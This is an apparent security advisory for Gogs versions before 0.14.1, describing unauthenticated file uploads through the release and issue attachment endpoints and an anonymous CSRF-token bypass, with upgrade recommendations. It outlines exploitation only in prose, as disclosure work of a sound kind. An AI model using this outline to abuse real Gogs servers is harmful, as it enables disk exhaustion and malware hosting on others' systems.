Brelinsky-Openai

**Name of the Vulnerable Software and Affected Versions** Gogs versions prior to 0.14.1 Gogs versions 0.13.4 and below **Description** Gogs, an open-source self-hosted Git service, allows unauthenticated file uploads by default. When the `RequireSigninView` setting is disabled (which is the default configuration), any remote user can upload arbitrary files to the server through the `/releases/attachments` and `/issues/attachments` API endpoints. This can lead to the Gogs instance being misused as a public file host, potentially resulting in disk exhaustion, hosting of unwanted content, or the delivery of malware. The issue stems from the `UploadIssueAttachment()` and `UploadReleaseAttachment()` functions. While CSRF protection is enabled, attackers can bypass it by obtaining a valid token anonymously. Exploitation involves sending a POST request to the vulnerable endpoints with a valid CSRF token and the file to be uploaded. This allows attackers to store arbitrary content on the server, potentially leading to denial-of-service conditions or malware distribution. **Recommendations** Versions prior to 0.14.1 should be updated to version 0.14.1 or later. Versions 0.13.4 and below should be updated to version 0.14.1 or later.